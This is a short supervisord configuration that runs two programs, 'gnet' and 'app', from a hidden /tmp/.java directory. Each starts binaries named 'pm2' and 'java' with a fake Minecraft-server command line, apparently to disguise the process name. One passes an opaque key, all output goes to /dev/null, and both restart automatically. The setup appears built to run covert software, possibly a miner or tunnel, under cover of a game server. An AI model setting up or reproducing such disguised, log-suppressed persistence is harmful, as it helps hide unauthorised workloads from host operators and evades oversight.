[supervisord]
logfile=/dev/null

[program:gnet]
directory=/tmp/.java/bin/a
command=./pm2 -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./java -s "i1fB3e-2K9c5A1-3D9g8H-bj756C4a9-f6X1e9Fd-6A2K9A1-5J1g" -liq
stdout_logfile=/dev/null
autorestart = true

[program:app]
directory=/tmp/.java/bin/b
command=./pm2 -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -jar server.jar' ./java -c ./conf.json
stdout_logfile=/dev/null
autorestart = true